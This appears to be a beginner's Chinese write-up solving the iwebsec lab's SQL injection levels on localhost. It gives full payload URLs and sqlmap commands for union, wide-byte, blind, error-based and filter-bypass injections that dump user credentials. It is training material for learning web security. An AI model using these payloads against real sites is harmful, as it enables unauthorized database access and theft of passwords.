被推荐了这个web平台,感觉挺适合新手的,网上搜了下没看到有人写wp,这里本入门萌新来稍微整理下自己解题的过程
SQL注入漏洞
01-数字型注入
http://localhost:32774/sqli/01.php?id=1'
发现有报错
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ LIMIT 0,1’ at line 1
猜测语句WHERE id=$id LIMIT 0,1
验证一下
查列数
查显示位
爆库http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%20--+
爆表http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%20--+
爆列http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema%20=database()%20and%20table_name=%27users%27)%20--+
爆数据http://localhost:32774/sqli/01.php?id=1%20union%20select%201,2,(select%20group_concat(concat(role,0x7e,username,0x3A,password,0x7e))%20from%20users)%20%20--+
02-字符型注入
http://localhost:32774/sqli/02.php?id=1' or '1=2–'
报错
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1’ or ’1=2–’’ LIMIT 0,1’ at line 1
看源码,发现SET NAMES gbk
猜测宽字节注入
尝试http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,3 --+
爆库http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
爆表http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+
爆数据http://localhost:32774/sqli/02.php?id=1%df' and 1=2 union select 1,2,(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) --+
这里除了前面通过宽字节来让mysql以为是个汉字绕过检查其他和第一题一样
03-bool注入
http://localhost:32774/sqli/03.php?id=1 and 1=2 --+
检测出来存在是布尔注入就懒得写jio本了,sqlmap直接梭
爆库sqlmap -u http://localhost:32774/sqli/03.php?id=1 --current-db
爆表sqlmap -u http://localhost:32774/sqli/03.php?id=1 -D iwebsec --tables
爆列sqlmap -u http://localhost:32774/sqli/03.php?id=1 -D iwebsec -T users --columns
爆数据sqlmap -u http://localhost:32774/sqli/03.php?id=1 -D iwebsec -T users -C role,username,password --dump
04-sleep注入
自己的脚本真的很丑,这里就不丢脸了
时间盲注爆库sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 --current-db
爆表sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 -D iwebsec --tables
爆列sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 -D iwebsec -T user --columns
爆数据sqlmap -u http://localhost:32774/sqli/04.php?id=1 -p id --technique T --time-sec 3 -D iwebsec -T user -C id,password,username --dump
05-updatexml注入
这题限制条件没弄好,用第一题的payload都能跑
但还是用题目的预期过一遍and (updatexml(1,concat(0x7e,(select version()),0x7e),1))
先检验http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select version()),0x7e),1))
存在注入,并使用updatexml函数注入
爆库http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1))
爆表http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select (select group_concat(table_name) from information_schema.tables where table_schema=database())),0x7e),1))
爆列http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select (select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')),0x7e),1))
爆数据http://localhost:32774/sqli/05.php?id=1 and (updatexml(1,concat(0x7e,(select (select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)),0x7e),1))
06-宽字节注入
这题看题目就是宽字节,和之前第二题的做法重了,就换个方法,用sqlmap过一遍
这里需要知道的是直接sqlmap -u http://localhost:32774/sqli/06.php?id=1
是找不到注入的,需要sqlmap -u http://localhost:32774/sqli/06.php?id=1%df%27
或者使用tamper=”unmagicquotes”sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" --current-db
爆库sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" --current-db
爆表sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" -D iwebsec --tables
爆列sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" -D iwebsec -T users --colums
爆数据sqlmap -u "http://localhost:32774/sqli/06.php?id=1" --tamper="unmagicquotes" -D iwebsec -T users -C role,username,password --dump
07-空格过滤绕过
看题可知过滤了空格,这里我选择用括号让参数之间没有空格http://localhost:32774/sqli/07.php?id=(0)or(1)=(1)
查显示位http://localhost:32774/sqli/07.php?id=(0)%0aunion%0aselect(1),(2),(3)
爆库http://localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(schema_name)%0Afrom%0Ainformation_schema.schemata)
爆表localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(table_name)%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema=database())
爆列http://localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(column_name)%0Afrom%0Ainformation_schema.columns%0awhere%0atable_schema=database()and(table_name='users'))
爆数据http://localhost:32774/sqli/07.php?id=(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(concat(role,0x7e,username,0x3A,password,0x7e))%0Afrom%0Ausers)
08-大小写过滤绕过
常规测试后发现测试点在select上,根据题目只要对select进行大小写变换就行
显示位
爆库http://localhost:32774/sqli/08.php?id=1 union Select 1,2,group_concat(schema_name) from information_schema.schemata--+
爆表http://localhost:32774/sqli/08.php?id=1 union Select 1,2,(Select group_concat(table_name) from information_schema.tables where table_schema=database())--+
爆列http://localhost:32774/sqli/08.php?id=1 union Select 1,2,(Select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')--+
爆数据http://localhost:32774/sqli/08.php?id=1 union Select 1,2,(Select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)--+
09-双写关键字绕过
确认存在注入
发现过滤了select字符串,题目可得需要用双写来绕过,试一下http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,3--+
绕过的原因
因为在匹配到”se”+”select”+”lect”中的select后替换为空后前后拼接起来就是select成功的绕过唯一一次检验
爆库http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,group_concat(schema_name) from information_schema.schemata--+
爆表http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,(seselectlect group_concat(table_name) from information_schema.tables where table_schema=database())--+
爆列http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,(seselectlect group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')--+
爆数据http://localhost:32774/sqli/09.php?id=1 union seselectlect 1,2,(seselectlect group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)--+
10-双重url编码绕过
根据题目可以猜到源码对$id进行了一次urldecode,在测试的过程中还能发现对select进行了waf,所以只需要根据第八题的payload进行两次urlencode即可
脚本
a = ""
print urllib.quote(urllib.quote(a))
本以为是这样的
结果完全没派上用场,第八题的语句完全照搬都能跑得通
但出于对题目的尊重还是用双重url编码绕过一下吧
爆库
原句
1 union Select 1,2,group_concat(schema_name) from information_schema.schemata#
编码后1%2520union%2520Select%25201%252C2%252Cgroup_concat%2528schema_name%2529%2520from%2520information_schema.schemata%2523
最终http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252Cgroup_concat%2528schema_name%2529%2520from%2520information_schema.schemata%2523
爆表
原句
1 union Select 1,2,(Select group_concat(table_name) from information_schema.tables where table_schema=database())#
编码后1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528table_name%2529%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2529%2523
最终http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528table_name%2529%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2529%2523
爆列
原句
1 union Select 1,2,(Select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')#
编码后1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528column_name%2529%2520from%2520information_schema.columns%2520where%2520table_schema%2520%253Ddatabase%2528%2529%2520and%2520table_name%253D%2527users%2527%2529%2523
最终http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528column_name%2529%2520from%2520information_schema.columns%2520where%2520table_schema%2520%253Ddatabase%2528%2529%2520and%2520table_name%253D%2527users%2527%2529%2523
爆数据
原句
1 union Select 1,2,(Select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) #
编码后1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528concat%2528role%252C0x7e%252Cusername%252C0x3A%252Cpassword%252C0x7e%2529%2529%2520from%2520users%2529%2520%2523
最终http://localhost:32774/sqli/10.php?id=1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528concat%2528role%252C0x7e%252Cusername%252C0x3A%252Cpassword%252C0x7e%2529%2529%2520from%2520users%2529%2520%2523
11-十六进制绕过
先按正常步骤去做
查显示位http://localhost:32774/sqli/11.php?id=1%20union%20select%201,2,3--+
爆库localhost:32774/sqli/11.php?id=1 union select 1,2,group_concat(schema_name) from information_schema.schemata--+
爆表localhost:32774/sqli/11.php?id=1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
查列的时候问题就来了,发现引号被过滤了
这里就考虑到使用user的十六进制绕过限制
爆列http://localhost:32774/sqli/11.php?id=1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name=0x75736572)--+
爆数据http://localhost:32774/sqli/11.php?id=1 union select 1,2,(select group_concat(concat(id,0x7e,username,0x3A,password,0x7e)) from user) --+
12-等价函数替换过滤绕过
简单尝试后可知对等号进行了waf,那么爆库的语句还是正常的http://localhost:32774/sqli/12.php?id=1 union select 1,2,group_concat(schema_name) from information_schema.schemata--+
这里就根据题目,使用与等号等价的函数进行替换,这里我选择用like,因为如果没有使用百分号,like子句与等号的效果是一样的
爆表http://localhost:32774/sqli/12.php?id=1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema like database())--+
爆列http://localhost:32774/sqli/12.php?id=1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema like database() and table_name like 'users')--+
爆数据http://localhost:32774/sqli/12.php?id=1 union select 1,2,(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) --+
13-二次注入
这题其实挺简单的,简单的整理下流程
1.注册用户,输入username,password,email
2.找回密码,输入存在的邮箱即可返回用户名和密码
那么问题来了,这是一道注入题,从注入的角度来说应该是在username放入查询语句再通过找回密码来执行
但由于我很懒,我选择直接用万能密码法
这样就会使查询语句查的是admin而不是admin'#